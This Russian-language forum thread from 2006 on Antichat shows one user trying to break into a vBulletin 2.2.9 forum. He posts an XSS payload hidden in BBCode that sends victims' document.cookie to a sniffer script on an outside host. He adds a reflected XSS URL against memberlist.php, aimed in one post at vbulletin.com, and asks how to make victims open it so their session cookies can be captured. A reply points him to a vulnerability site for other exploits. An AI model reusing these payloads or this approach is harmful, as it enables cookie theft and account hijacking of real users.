Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Как можно зашифровать инъекцию на форум так чтобы ее видно не было? |
16.01.2006, 17:48
|
|
Новичок
Регистрация: 13.01.2006
Сообщений: 8
Провел на форуме:
37195
Репутация:
2
|
|
Как можно зашифровать инъекцию на форум так чтобы ее видно не было?
Есть форум vBulletin 2.2.9
Судя по всему админы не поленились и закрыли (казалось бы все возможные дыры).
Пробовал множество инъекций в сообщениях, но они все видны или видны на половину
Пример:
Вставлял:
Код HTML:
[url]http://www.[url=http://wj.com/style=display:none,background:url(javascript:docum ent.images[1].src="http://antichat.ru/cgi-bin/s.jp g?"+document.cookie,) ]wj[/url][/url]
Форум выводил:
Код HTML:
[url]http://www..src="http://antichat.ru/cgi-bin/s.jp g?"+document.cookie,) ]wj[/url]
как раз то что должно быть скрыто он и выводит!
Хотелось бы побольше узнать про инъекции, как и что надо менять чтобы ее видно не было.
Заранее спасибо. |
|
|
16.01.2006, 19:49
|
|
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487
Репутация:
11
|
|
Если он выводит тебе сообщение, т.е. тот код что ты ввел, то значит он (код) не сработал => скрытие тебе не поможет, результатом работы кода (обычно) является алерт, или спи**ивание куков, и это никак не отображается... т.е. ты в сам код внедряешь свой код... так что те коды у тебя не работает.
|
|
|
|
16.01.2006, 19:52
|
|
Новичок
Регистрация: 13.01.2006
Сообщений: 8
Провел на форуме:
37195
Репутация:
2
|
|
Сообщение от WizART
Если он выводит тебе сообщение, т.е. тот код что ты ввел, то значит он (код) не сработал => скрытие тебе не поможет, результатом работы кода (обычно) является алерт, или спи**ивание куков, и это никак не отображается... т.е. ты в сам код внедряешь свой код... так что те коды у тебя не работает.
Хорошо, а как это обойти ?
|
|
|
|
16.01.2006, 20:02
|
|
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487
Репутация:
11
|
|
Это нельзя "обойти", если код не работает - значит уже пропатчили, ищи другой код или уязвимости в этой версии форума. Поищи баги на СекЛабе( http://securitylab.ru) |
|
|
|
16.01.2006, 20:31
|
|
Новичок
Регистрация: 13.01.2006
Сообщений: 8
Провел на форуме:
37195
Репутация:
2
|
|
Сообщение от WizART
Это нельзя "обойти", если код не работает - значит уже пропатчили, ищи другой код или уязвимости в этой версии форума. Поищи баги на СекЛабе( http://securitylab.ru) на секлабе нашел прочку,
вот:
Код:
memberlist.php?ХХХs= ХХХ 23c37cf1af5d2ad05f49361b0407 ХХ ad9e&what=">"<Script>javascript:alert(document.cookie)</Script>
помог мне добыть мои же кукис, когда я был на форуме и ввел это в броузер!
а как достать нужные кукис пока не знаю (есть предложения ? )
Последний раз редактировалось ПсиХ; 16.01.2006 в 20:35..
|
|
|
|
16.01.2006, 20:49
|
|
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487
Репутация:
11
|
|
Прально, чтобы добыть чужие кукис нужно чтобы другой чел открыл тему/пост с кодом, который пи*дит куки...
|
|
|
|
16.01.2006, 20:57
|
|
Новичок
Регистрация: 13.01.2006
Сообщений: 8
Провел на форуме:
37195
Репутация:
2
|
|
Сообщение от WizART
Прально, чтобы добыть чужие кукис нужно чтобы другой чел открыл тему/пост с кодом, который пи*дит куки...
Дык чтобы использовать и получать чужие кукис это
Код:
http://www.vbulletin.com/forum/memberlist.php? Х s Х = Х 23c37cf1af5d2ad05f49361b0407 ХХХ ad9e &what=">"<Scr*ipt>javascript:alert(document.cookie)</Scr*ipt>
нужно как нибудь преобразовать, ведь эта фактически ссылка а не инъекция или еще что! и работает она на добавлении кода с получением кукисов
|
|
|
|
16.01.2006, 21:01
|
|
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487
Репутация:
11
|
|
Кукисы берутся из клиента-броузера пользователя а не сервера, насколько я знаю.
|
|
|
|
16.01.2006, 21:09
|
|
Новичок
Регистрация: 13.01.2006
Сообщений: 8
Провел на форуме:
37195
Репутация:
2
|
|
Сообщение от WizART
Кукисы берутся из клиента-броузера пользователя а не сервера, насколько я знаю.
правильно, но эту ссылку должна как я понимаю открывать Жертва + ссылку надо модернизировать чтоб на снифер снимать кукисы
|
|
|
|
18.01.2006, 23:13
|
|
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487
Репутация:
11
|
|
Ищи другой способ.
//модерам
ЧТО за тупая привычка стирать нужные посты?
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
